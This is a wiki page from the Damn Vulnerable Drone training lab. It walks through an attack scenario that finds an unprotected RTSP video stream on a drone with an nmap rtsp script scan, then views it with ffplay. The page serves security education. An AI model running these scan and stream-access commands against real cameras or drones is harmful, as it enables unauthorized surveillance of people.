Camera Feed Eavesdropping - nicholasaleks/Damn-Vulnerable-Drone GitHub Wiki

Intercepting unprotected video streams from a drone’s onboard camera via RTSP

Damn Vulnerable Drone > Attack Scenarios > Exfiltration > Camera Feed Eavesdropping

Description

In this scenario, an attacker intercepts the real-time video feed from a drone's camera. By leveraging insecure RTSP (Real-Time Streaming Protocol) streams, the attacker can gain unauthorized access to the video footage, which can then be used for surveillance or to gather sensitive information.

Resources

⚠️ Solution Guide

Step 1

Install ffplay if it is not already available on your Kali system.

sudo apt install ffplay

Step 2

Use Nmap to identify RTSP streams exposed by the drone.

nmap 10.13.0.3 --script rtsp*

You should see output similar to:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 20:39 EDT
Nmap scan report for 10.13.0.3
Host is up (0.000092s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE
554/tcp  open  rtsp
|_rtsp-methods: OPTIONS, DESCRIBE, ANNOUNCE, GET_PARAMETER, PAUSE, PLAY, RECORD, SETUP, SET_PARAMETER, TEARDOWN
| rtsp-url-brute: 
|   discovered: 
|_    rtsp://10.13.0.3/stream1
3000/tcp open  ppp

Step 3

Use ffplay to connect and view the drone’s video stream.

ffplay rtsp://10.13.0.3:554/stream1
⚠️ **GitHub.com Fallback** ⚠️